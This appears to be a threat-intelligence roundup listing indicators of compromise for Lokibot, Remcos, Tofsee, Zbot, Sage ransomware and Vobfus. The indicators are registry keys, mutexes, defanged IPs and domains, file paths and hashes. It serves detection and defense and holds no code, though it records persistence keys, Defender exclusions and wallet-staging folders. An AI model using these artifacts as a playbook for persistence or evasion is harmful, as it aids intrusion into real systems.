0adc56352600d4dd0a413986ffa45cbeaf04b973abdbd86c9b0c87a53440e294
10f8c098454c63c90a986d037d571d055f5174a00e1f380931157a84ecdc2c01
18b1f735465a3b6fba65570dbe125f10b8489587410a872973216ec853cb125b
1e663349f267cef450ab939b3904bdd33e0809f9080235241929e09fb7b770ae
270d791b5a9c8f7723563afffcb54932ee840920c7b68bed13d8c7aa689190ff
2ca4a4be4d6975d74bb50303fa61c453ae539c6982f88ac38553b7a7ca512813
3057b5a29b5ef78d36bce0c6c31ec2300f8c0ffdd67fc9f5efd7e3b1f00aa04a
334afefc5c14d97cd3af6ab570691d73c23b2c257fd988502a08fec02fc6f7b7
33a640afd9288415aff6de8ef74b85c1879784be2b73dd0900ab00d06dd519c0
3680469ac286cfb7a9ef01f31b5703cfdb965550dba9170d0d60a93ab316cb9a
36d13de18cddc5dcfb7bb8bb9e946c6c77a26be5e7098c1303e70db9f24511fd
39af3ab5ef14b0dd3adc7b2bffa4a344bf19caf9b3d9e9d4c78afab321466f8d
39c7f1118753de1bed52953ab491652c807970d42eff5f5366c3936a297f9220
3b7be616a488f39465e822097aedc82aec3b05e730bcd22e1d5d57e64227439e
3e653e5fbeda3f17ea2e35f2456769710d3210940f157fe25a18026943cef643
3ed50e60a4117ffb607a4843f95df60f6cacbc29498f05371073ae06a562dfc3
3fea545cce296bbbeb27176f2ce630493d3b680f789effa6d9dc26478d5f00cb
449d58bad679912feee287ed8e17ce6221bc61432707e9f189490119bcb9a76d
5263e898133a652e1e0ff1c94919d31c4c3da2bb1bf2fdbf876ba1dd18a01502
56b0d6771543530d8a49ff3e8581f0a81330500ca9e6794a15f6876a394285f7
See JSON for more IOCs

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Malware.Lokibot-6987581-1

Indicators of Compromise

Registry Keys	Occurrences
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED Value Name: Hidden`	2
`<HKLM>\Software\Wow6432Node\Microsoft\Tracing\RASAPI32`	2
`<HKLM>\Software\Wow6432Node\Microsoft\Tracing\RASMANCS`	2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32 Value Name: EnableFileTracing`	2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32 Value Name: EnableConsoleTracing`	2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32 Value Name: FileTracingMask`	2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32 Value Name: ConsoleTracingMask`	2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32 Value Name: MaxFileSize`	2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32 Value Name: FileDirectory`	2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS Value Name: EnableFileTracing`	2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS Value Name: EnableConsoleTracing`	2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS Value Name: FileTracingMask`	2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS Value Name: ConsoleTracingMask`	2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS Value Name: MaxFileSize`	2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS Value Name: FileDirectory`	2
`<HKCU>\SOFTWARE\Microsoft\Protected Storage System Provider\S-1-5-21-2580483871-590521980-3826313501-500`	2
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: internat.exe`	1
`<HKCU>\Software\Microsoft\Windows Script Host\Settings`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: deaqsdegdd`	1
`<HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\U6T0UXHWPB`	1

Mutexes	Occurrences
`3749282D282E1E80C56CAE5A`	19
`-`	1
`eed3bd3a-a1ad-4e99-987b-d7cb3fcfa7f0 - S-1-5-21-2580483871-590521980-3826313501-500`	1
`d19ab989-a35f-4710-83df-7b2db7efe7c5{846ee340-7039-11de-9d20-806e6f6e6963}`	1

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`87[.]251[.]88[.]30`	5
`87[.]251[.]88[.]27`	4
`93[.]158[.]134[.]38`	2
`47[.]254[.]177[.]155`	2
`87[.]251[.]88[.]28`	2
`87[.]251[.]88[.]19`	2
`69[.]195[.]146[.]130`	1
`104[.]16[.]154[.]36`	1
`104[.]16[.]155[.]36`	1
`192[.]185[.]129[.]109`	1
`185[.]29[.]9[.]246`	1
`5[.]253[.]62[.]214`	1
`149[.]129[.]242[.]147`	1
`104[.]31[.]83[.]247`	1
`37[.]120[.]146[.]124`	1
`37[.]120[.]146[.]122`	1
`84[.]234[.]96[.]91`	1
`145[.]239[.]202[.]109`	1

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`doosantax[.]com`	4
`bridgecornenterprises[.]com`	3
`smtp[.]yandex[.]com`	2
`whatismyipaddress[.]com`	2
`unimasa[.]icu`	2
`ip-api[.]com`	1
`OK`	1
`sas-agri[.]ml`	1
`SIBARZZ[.]XYZ`	1
`plutonav[.]ru`	1
`bestbtcchange[.]com`	1
`officialhillcoms[.]ga`	1
`beatfile01[.]ml`	1
`freecaps3[.]ml`	1
`flmates[.]com`	1
`www[.]dlamaqperu[.]com`	1
`lronman4x4[.]com`	1
`apollocapitalp[.]com`	1

Files and or directories created	Occurrences
`%ProgramData%\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol`	23
`%LOCALAPPDATA%\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol`	23
`%APPDATA%\D282E1`	19
`%APPDATA%\D282E1\1E80C5.lck`	19
`%APPDATA%\pid.txt`	2
`%APPDATA%\pidloc.txt`	2
`%TEMP%\holdermail.txt`	2
`%TEMP%\holderwb.txt`	2
`%ProgramData%\freebl3.dll`	1
`%ProgramData%\mozglue.dll`	1
`%ProgramData%\msvcp140.dll`	1
`%ProgramData%\nss3.dll`	1
`%ProgramData%\softokn3.dll`	1
`%ProgramData%\vcruntime140.dll`	1
`%TEMP%\deaqsdegdd\deaqsdegdd.exe`	1
`%TEMP%\deaqsdegdd\deaqsdegdd.vbs`	1
`%ProgramData%\4O1XVHRT01HDEJRSE1PVNWXU7\files\Soft\Authy`	1
`%ProgramData%\4O1XVHRT01HDEJRSE1PVNWXU7\files\Wallets`	1
`%ProgramData%\4O1XVHRT01HDEJRSE1PVNWXU7\files\Wallets\ElectronCash`	1
`%ProgramData%\4O1XVHRT01HDEJRSE1PVNWXU7\files\Wallets\Electrum`	1
`%ProgramData%\4O1XVHRT01HDEJRSE1PVNWXU7\files\Wallets\ElectrumLTC`	1
`%ProgramData%\4O1XVHRT01HDEJRSE1PVNWXU7\files\Wallets\Ethereum`	1
`%ProgramData%\4O1XVHRT01HDEJRSE1PVNWXU7\files\Wallets\Exodus`	1
`%ProgramData%\4O1XVHRT01HDEJRSE1PVNWXU7\files\Wallets\JAXX`	1
`%ProgramData%\4O1XVHRT01HDEJRSE1PVNWXU7\files\Wallets\MultiDoge`	1
See JSON for more IOCs

File Hashes

21ea64cf87a724414eaaa6cc7a69a38cebef6b5507084f036b486adb3f805417
25fa58e7d7821ca2c5cdb947422289eae7d3909efc9455a7a5ef4e476947f4ce
30120ab8f904030dcd4748b4b5edc38f9437ee18d582ffd86c63882ef0afc1e5
33527e13eaf4f1ad749a5d00e5f2f8c06e55503a492cdd3a2a01bebc79360aa3
39bd8e2feb6ff6b4b8d25f5e8f9e2e413d7df9241c9effde6cf5c074b0360964
425b00366b5e0bbcbecaa17a6f3767ce182d10cb54d14b8146d60795e0a91b4a
45332fc059e1f72e4c9c27bd61e33b9af765299f3685bc1e33e31dae5206311b
46773272beedf1cbcd61b41e399df8c437d8c915e3f942115eaa48c5a44af025
4e59cb8c79d9dd7964e5319be30a91b8dee1744054e6e7c470717dab91c95905
527eee4d3d2df6305545a95c33e17524a22464ba921f5091489bc776287e9082
618c7974abfa637082c14b741cab9c859f0ea5ef9cb7517824d5c956886b9959
6f86b9a80e340cae7b6ce7c70b06f7237c54019c37faa9dd888b57fe15568d6c
72394394c1b0b5d02fe6e362fd07940a6d69551fa7fcacef03c0d82f41fc8fbc
83ad9a9b79964ccec70ccf12c7e01c0ea6ea0dcf391dd2ac014d2381e1ba42f1
90836122fddbc258f491d097e53e155258999cee41fe1550c78354aa3c8f2e04
98a3e55133d7a23d343f2d690650e5579e485500447f0fff3e0e23f29c9fa86f
9ad80c24445040b882abd94406f5bd389ab83b400ac4177687e653277788d7f3
a493e9a4662dabc9083cde701821e1df98e499dd9404f49dbedbe3f55fedd764
c6605ed53413e717e788b8f551455a1f9e94a313ebd00613fac0c63f7bfb920f
cce98d91043e66d5b85e536b8864e604d2b26566a8d875dda21e93f51efc6f71
dc9c4bb8db7e3b0d26dab3572df9ab97cd0218c14a17621104c2a6c095a61f40
dd33d5c467751e8f531bd557cc74f91619d43e3c8ebd1a516c339f33d3be9ac3
e25beccc8caa3518794a0ba5edbdc99916a66cee94fd55e25d9d34a23420bbe0

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Malware.Remcos-6985941-1

Indicators of Compromise

Registry Keys	Occurrences
`<HKCU>\Software\remcos_jpetmoenqu`	25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: srvs`	21
`<HKCU>\SOFTWARE\REMCOS_JPETMOENQU Value Name: EXEpath`	18

Mutexes	Occurrences
`\BaseNamedObjects\remcos_jpetmoenqu`	25
`Remcos_Mutex_Inj`	21
`remcos_jpetmoenqu`	21

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`213[.]208[.]129[.]213`	25

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
N/A	-

Files and or directories created	Occurrences
`%TEMP%\install.bat`	25
`%HOMEPATH%\MdRes`	25
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\RmClient.url`	25
`%APPDATA%\WindowsApp\logs.dat`	25
`%APPDATA%\WindowsApp\srvs.exe`	25
`%HOMEPATH%\MdRes\RmClient.vbs`	25
`%HOMEPATH%\MdRes\klist.exe`	25
`%HOMEPATH%\Start Menu\Programs\Startup\RmClient.url`	25
`%APPDATA%\WindowsApp`	21

File Hashes

2d0c8f189df656a4eb6e0352bd32fb21c3afbce9ea7c345550386ce0127c320a
30f9c76cd44a579c337269351ab40daf575e5996769cf23ab9a0047663593809
33baecfca9dcc0ad6c662a1df86a3ee2e97a9c042e6951145a1139674ee040ad
430d466c1c81f8b680b5e8d57eb696a1c09efc0727009ee3412698bdbd77cede
4ee4c01b513f59cef746c45b14b8211597937dfba27fb58b5e003fe97b7c87ce
516aee696300bb4b56085134b659caa5800a89badc46fc6611864ff5e79ca872
561a586d20b38ac2bac223d970186c02bacfdca09c96fe7d41125483b0a583d0
6319c58313ab6b8172994320d5ae1c16dc3e0cd1462d10eddc1244dc2573b987
68df7e2ac8625213080dad97fb015f78d0a7cbcf560e1d118879a7c949cf2eb4
7f3e2f8ba14f4f08655e53d1e4daf2fd581e58a444c8c66c57292e28fdde1afc
876ba61de5a3feb2e34181bc9a6e1197e70215b51cc169126c2d0bf0bb7588d4
8eca101db0d90f835dce7436a4e36f786694950a27eef3bfcbc458a347118f3f
9d3547fe7517b3a9cd60eb408e9233273433bcd1bf86093ee7040f8162e54b9a
a280c5a73c7388441c7b06d600fd0237cce304d02b93a80a88dff73e1e1fbcc8
abd1175388917b260096ca11cc3a8c3e56425abd0dc04650f528ad1669214923
b67255713feb497e145187f505da1cb42becbc0684f2b23efb1bbeff2f2f7431
b95ea3839a21dfeac94eb4f21efd35d2f1652a7e4c7f65b08bdc846685a7de44
c5f806ef8bdaec76e4b022eac1386fd7954522542e7ce21afbc7f7e848d35e12
cc5535a4f201268e7a60692d4b21f2da0478771f6fd3379b43f36dbd13d0a2d3
d47300165d3868f3b9ad434e8256a950ba2d83a5b71a684000fda9bdbd673585
e3fa269a38eea19a1d0e8fbdf9432347109a365378afe16a77fe5956e825ae53
effec65407157ad26d5bea08a1def289630078e9c88e4fc70b1e11f83836476d
f601204c1446b69b8a5606eb6bfe4e8bded5287513a1beab99160d0495e79f4f
f67262db3cd9ff311c83c274b4498a60147316ba82b8e91b16bd2292082c3ff5
fa6030698b41b7d260a55312fd83746df4c79d3f86e4c565ae170414d79b1642
See JSON for more IOCs

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Malware.Tofsee-6988429-1

Indicators of Compromise

Registry Keys	Occurrences
`<HKLM>\System\CurrentControlSet\Services\NapAgent\Shas`	17
`<HKLM>\System\CurrentControlSet\Services\NapAgent\Qecs`	17
`<HKLM>\System\CurrentControlSet\Control\SecurityProviders\Schannel`	17
`<HKLM>\System\CurrentControlSet\Services\NapAgent\LocalConfig`	17
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\Enroll\HcsGroups`	17
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\UI`	17
`<HKU>\.DEFAULT\Control Panel\Buses`	17
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config3`	17
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config0`	17
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config1`	17
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config2`	17
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS Value Name: C:\Windows\SysWOW64\dwkqpxds`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\dwkqpxds`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DWKQPXDS Value Name: Type`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DWKQPXDS Value Name: Start`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DWKQPXDS Value Name: ErrorControl`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DWKQPXDS Value Name: DisplayName`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DWKQPXDS Value Name: WOW64`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DWKQPXDS Value Name: ObjectName`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DWKQPXDS Value Name: Description`	2
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS Value Name: C:\Windows\SysWOW64\rkyedlrg`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\rkyedlrg`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG Value Name: Type`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG Value Name: Start`	2
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG Value Name: ErrorControl`	2

Mutexes	Occurrences
N/A	-

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`239[.]255[.]255[.]250`	17
`69[.]55[.]5[.]250`	17
`46[.]4[.]52[.]109`	17
`176[.]111[.]49[.]43`	17
`85[.]25[.]119[.]25`	17
`144[.]76[.]199[.]2`	17
`144[.]76[.]199[.]43`	17
`43[.]231[.]4[.]7`	17
`192[.]0[.]47[.]59`	17
`94[.]23[.]27[.]38`	17
`211[.]231[.]108[.]46`	14
`213[.]209[.]1[.]129`	13
`173[.]194[.]207[.]27`	12
`188[.]125[.]73[.]87`	11
`199[.]212[.]0[.]46`	10
`104[.]47[.]53[.]36`	10
`104[.]47[.]5[.]33`	9
`104[.]47[.]124[.]33`	9
`98[.]137[.]159[.]24`	8
`216[.]239[.]36[.]21`	7
`104[.]47[.]8[.]33`	7
`104[.]47[.]0[.]33`	7
`62[.]211[.]72[.]32`	7
`213[.]205[.]33[.]61`	7
`148[.]163[.]156[.]1`	7
See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`250[.]5[.]55[.]69[.]in-addr[.]arpa`	17
`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org`	17
`250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org`	17
`mta5[.]am0[.]yahoodns[.]net`	17
`250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net`	17
`whois[.]iana[.]org`	17
`250[.]5[.]55[.]69[.]bl[.]spamcop[.]net`	17
`whois[.]arin[.]net`	17
`eur[.]olc[.]protection[.]outlook[.]com`	17
`250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org`	17
`hotmail-com[.]olc[.]protection[.]outlook[.]com`	17
`microsoft-com[.]mail[.]protection[.]outlook[.]com`	17
`sweety2001[.]dating4you[.]cn`	17
`honeypus[.]rusladies[.]cn`	17
`katarinasw[.]date4you[.]cn`	17
`marina99[.]ruladies[.]cn`	17
`mx-eu[.]mail[.]am0[.]yahoodns[.]net`	16
`tiscali[.]it`	16
`etb-1[.]mail[.]tiscali[.]it`	16
`hanmail[.]net`	14
`mx1[.]hanmail[.]net`	14
`ipinfo[.]io`	13
`smtp-in[.]libero[.]it`	13
`libero[.]it`	13
`tiscalinet[.]it`	13
See JSON for more IOCs

Files and or directories created	Occurrences
`%HOMEPATH%`	17
`%SystemRoot%\SysWOW64\config\systemprofile:.repos`	17
`%SystemRoot%\SysWOW64\config\systemprofile`	17
`%SystemRoot%\SysWOW64\dwkqpxds`	2
`%SystemRoot%\SysWOW64\rkyedlrg`	2
`%SystemRoot%\SysWOW64\athnmuap`	1
`%SystemRoot%\SysWOW64\nguazhnc`	1
`%SystemRoot%\SysWOW64\wpdjiqwl`	1
`%SystemRoot%\SysWOW64\piwcbjpe`	1
`%SystemRoot%\SysWOW64\qjxdckqf`	1
`%TEMP%\euatucsb.exe`	1
`%TEMP%\bvxuokuz.exe`	1
`%TEMP%\baqmtpu.exe`	1
`%TEMP%\idkhgdza.exe`	1
`%TEMP%\irjirdhy.exe`	1
`%TEMP%\mgifzvfk.exe`	1
`%TEMP%\kmhypjqj.exe`	1
`%TEMP%\tryutcar.exe`	1
`%System32%\sflmyjon\mgifzvfk.exe (copy)`	1

File Hashes

1d7dce1a75f19e02b554764e116205833fc300e13e407a1424aee1f7efcef491
2896e3d9e7e10b9faa9254c44f78b7bc7005fa008090234eb5d92ddc55415f12
33906a7062f316e0683753977c6018675877c19755d830bbca04e6c87cd7d727
3b902891e76a3efe254aaa04071bee804576585be3324f1938001827e817f3a1
478f07fdb1dcd3672ff5d290c70d5f372f5f5eb31ecdd7d9d5eba82cc316b7f2
490867ad1a8bea080a54486696c32aeeb614900e2af12f2766789267b9c84292
5b168cedb6dd729ddce5adaf8728639d9caab7513dce660cfa85f77b2d3a2fb1
6bff144513b6bca96b1a1681870f114bcdffaaca0aa23e1f523ef01ee81b4a3f
a448406f2e0e9583c0fe8f8366b55bb36e73ee3ef2d2258a13045be87488fecb
b66ab4ace074418791a4aa3b22d467087b3f72106844724d50ad8429867b9f27
bebc1ca1106ef7f9ab3773cb50dbfac77057d2ac485930ddde418734a30dcea6
d65a714eacd52d80ae4d81f7c3f0439b1eed742a91d8e18e351306a8e9a7d56a
dd949e91c747449bc0cf3271378e86160a4caba277441237f5854133b5b63e37
e0a341fb6e766d58f954fc9801b8c9b2e3b76dea4987b051673c9c9fbfb1bd5b
ebd599453987fc52d3783dfcb4b7cd93bd7d1cad864da460ea4fabd4340ddd09
f867deb777721ceec1e0da73c4f7599e20d041030e42bdc07e90b0ee58f171f5
fb1da0632e8f438ef9b22e13ccf98fc6cda8cbc79276a179f4e00a18fbc24554

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Packed.Zbot-6986485-1

Indicators of Compromise

Registry Keys	Occurrences
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS Value Name: LoadAppInit_DLLs`	25
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS Value Name: AppInit_DLLs`	25

Mutexes	Occurrences
N/A	-

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
N/A	-

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
N/A	-

Files and or directories created	Occurrences
`%ProgramData%\Mozilla\thfirxd.exe`	25
`%System32%\Tasks\aybbmte`	25
`%ProgramData%\Mozilla\lygbwac.dll`	25
`%HOMEPATH%\APPLIC~1\Mozilla\kvlcuie.dll`	22
`%HOMEPATH%\APPLIC~1\Mozilla\tfbkpde.exe`	22
`%SystemRoot%\Tasks\kylaxsk.job`	22

File Hashes

75a96e041086cc1af7696888b0519dcfdba518234345f55746ef5a3c5b7db554
7f0d74475cce26ef072c23f5788e56688d280645a5eed19537cdc66feed7d223
7f22ccfdfb24939537763a2f265979c540ef674e0f29101f57d63573863a4ebc
87aef6c3658a5e31c59df0dbd604d1309cff42b84cbe2761634e8e5f8add3cba
8fc42bf42753de20f7f8a889146d5ac3f81b1498b8de4695ed759d930c55a81e
9a3dab606f2bfa91bc7b4e1a6ddf2fde1a579daeea10d273c5d92ed5400ee72e
9f47c7fb5108b7802a9721115563d8485389e29d08082e747e5317e4b85a93b9
a8ccd6f1a376356ec6a54a0f233d495183d52bfbe0da041403c32717d5321853
b16564e7e63b6761a2a307d0f03b5eb8725b7f688693df8d4cea881f09b2d959
bbab6e4862965c729645b63b2dd3a73fde02cecb960a03169196ae409dcf424d
be492dd9101569320491e515e195d7679aa67e3d293ba551aa47724b5298a957
c2a7bd7b3f15334856a1631683490dce70db66ea8aea2b82589cf16e6a566829
cbaba36a158d6be04f18de282f77db026b1fcd82451a28e93aaaaedb363b9691
d8d3e9b08507ce57c428b0dcfad69ef8c9e303d7c89a14a44dd0a2b0fd14583c
da185a973d7add8f69eb42818c9783f0608f77e63036ec0014228ab9a2cefee9
dc5d91b1c9767f8920b8803266e6c8443f6c416c3a45c0321ba7124d9dca0d4d
de68595f96cae94bb027659485fe9dc90c92f1de376c2206ae351d397ffffcbb
e6efee10de9b5ae15896cd35f87ca6e108823f00857e6c4c6cdc97aae0a0e8aa
e8818da0e728731d74779bb9c8328ba40cf2331703a250f4f1369aaa996b9f79
ea45d1af873f9b6ba50a5c7e4e96bf7f62948ede9777391e1558530c02f3c3ec
eadf0dd3d9bb9c60c00328d43ae8b52657af58cce0794ecb31bff77b8a6eff8b
ed8653b1e049258b58ece93559603a0fdb998003c6ae3a0f9930bccf21bbcdf0
edd63bc56a1a477e20d52a7931177a65e4ab7f78f4f807a8eed1f3785a7fe704
ef7f834b58f201bc59b17a7a3e45e9cab4f0426a1c084506acb5be97c03fd376
efd021314885ae49896a01c9244a4ca301cfe74e72a3ad6ca35afc8dcbbc01f0
See JSON for more IOCs

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Ransomware.Sage-6987538-1

Indicators of Compromise

Registry Keys	Occurrences
`<HKLM>\System\CurrentControlSet\Control\Session Manager`	25
`<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER Value Name: PendingFileRenameOperations`	25
`<HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\##PC#Users`	25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\##PC#USERS Value Name: _CommentFromDesktopINI`	25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\##PC#USERS Value Name: _LabelFromDesktopINI`	25

Mutexes	Occurrences
`wj6qbq4X`	25
`\BaseNamedObjects\PFShggN3`	3
`\BaseNamedObjects\adX9ZN6Z`	3

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`5[.]45[.]6[.]138`	25
`5[.]45[.]159[.]19`	25
`5[.]45[.]140[.]6`	25
`139[.]59[.]93[.]181`	25
`5[.]45[.]226[.]237`	25
`138[.]197[.]136[.]196`	25
`138[.]197[.]105[.]68`	25
`211[.]114[.]30[.]7`	25
`5[.]45[.]247[.]22`	25
`138[.]197[.]196[.]19`	25
`138[.]197[.]122[.]68`	25
`139[.]59[.]227[.]172`	25
`211[.]114[.]64[.]63`	25
`5[.]45[.]129[.]52`	25
`138[.]197[.]22[.]151`	25
`211[.]114[.]47[.]80`	25
`211[.]114[.]28[.]235`	25
`138[.]197[.]109[.]79`	25
`5[.]45[.]242[.]197`	25
`139[.]59[.]219[.]237`	25
`5[.]45[.]24[.]236`	25
`139[.]59[.]185[.]4`	25
`5[.]45[.]238[.]90`	25
`211[.]114[.]135[.]136`	25
`211[.]114[.]84[.]142`	25
See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`mbfce24rgn65bx3g[.]2kzm0f[.]com`	25
`mbfce24rgn65bx3g[.]l3nq0[.]net`	25

Files and or directories created	Occurrences
`%TEMP%\__config252888.bat`	25
`%APPDATA%\1SKJ4BcT.tmp`	25
`%APPDATA%\h7Ph24Fx.exe`	25
`%System32%\Tasks\NuqH5Wz3`	25
`%HOMEPATH%\Documents\!HELP_SOS.hta`	20
`%HOMEPATH%\Documents\Outlook Files\!HELP_SOS.hta`	20
`%TEMP%\__config16184093.bat`	3
`%APPDATA%\qh78RMdu.exe`	3
`%APPDATA%\vpiuxHWP.tmp`	3
`%HOMEPATH%\Start Menu\Programs\Startup\TLkOeWe7.lnk`	3

File Hashes

1160b42660eafdbaa7e8eb963f3bb9ae17058c06248965265df0fe8b3d39fda0
239d51f57e2cb6b6dd712deeef8d87a4a1f78b10269424edf028f79eccf70bec
3599109b2d20e97baaec09e11e917058dc902158a377015c425a7371ff584054
5d62a735a26a9c4494ad3abefd99287889264451798948b8e3dd2a83370312c3
5e9e35441ce1473fedd37ca2356cb4932d47f62a9125903383706dba1c356896
6c4aa0ea8d6828c79bfc6e973ed1b03f88cf311dd7cd5b0ca2982221a29317d5
7aec11754a7a9c23b313376a188c4231e1d6f1e5110b689de56236d891f956d5
7f89228c94c44ab61cc5ba06ce6dad7524343a0c50dc394a39b0066a8378a349
80e3c7ad157c9b87a49817973591df737a0d1399bdc9c0a0093acecb7d50d21a
901ff9ae67350d0d294b9b666a7b1fc5612df5fa7e15acf78561716f5a6567f7
97c9f82d70fb957f74e31413b9ac00e56bdab268727f11189c781e7ac93b5479
98cc91e7d693e7b41f471f256ecf7f780847d37576696c94f005203a614be616
9c7b75a7daae70019419abd51ce4c2bea8e383bd7e618b45d640b08a5f07b99c
a24fef8d4b55e29dec0b57011e4aa605a39b0ce3d6f207d94ca6e83cd11edaa6
a5d950f3e43db37527ed31959ffeecb5fb8e7b96d5caae1356577b16dccf183b
a9ed29372780e5c7c43144308475457df9bc9767c5bdcc294a41eb4fb18a5ac1
bc584c0d484c2f772bfdfe5afce3860f8de64fc3f7a147aa731c48e62b8f895f
c039c4ba185062fd62b7033dbf3b323f15ee8ec385029c7e91560dab1e1b6a4b
c771267b2194218e3e8c81795f9e13382415cefea5809260acc7f2a2a0ff8838
ccf5439e4290e97bb501bf81b8e2c868fd602799dfaaf45254454bb796ffe8a5
dc0eddac68e6ef891133b6992bdacf4993b49a1a23d3b279ce3092588cb8d1c1
e4fe560783615e0fc7b410b7c951095749f15dbcb54dd05d1f20fc56da90cb70
e6a535eaf2e4d37287a4dde09528a29095daa74f05378239b4786b3f90f42192
ec49a254c5bc7d07d346d5821483cd10ad166b2b96ffd59aa9038bace5fc82e8
fddf11ffb5c70acf8f0d0c4de1cc352948c263a8646ced62248fd689f4555756

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware

Win.Worm.Vobfus-6986418-0

Indicators of Compromise

Registry Keys	Occurrences
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WindowsUpdate`	24
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED Value Name: ShowSuperHidden`	24
`<HKLM>\SOFTWARE\WOW6432NODE\Policies`	24
`<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\WindowsUpdate\AU`	24
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\AU`	24
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\AU Value Name: NoAutoUpdate`	24
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: xyyiaf`	2
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: wdciac`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: tioguh`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: xaone`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: goatia`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: muunai`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: woiotin`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: xanix`	1
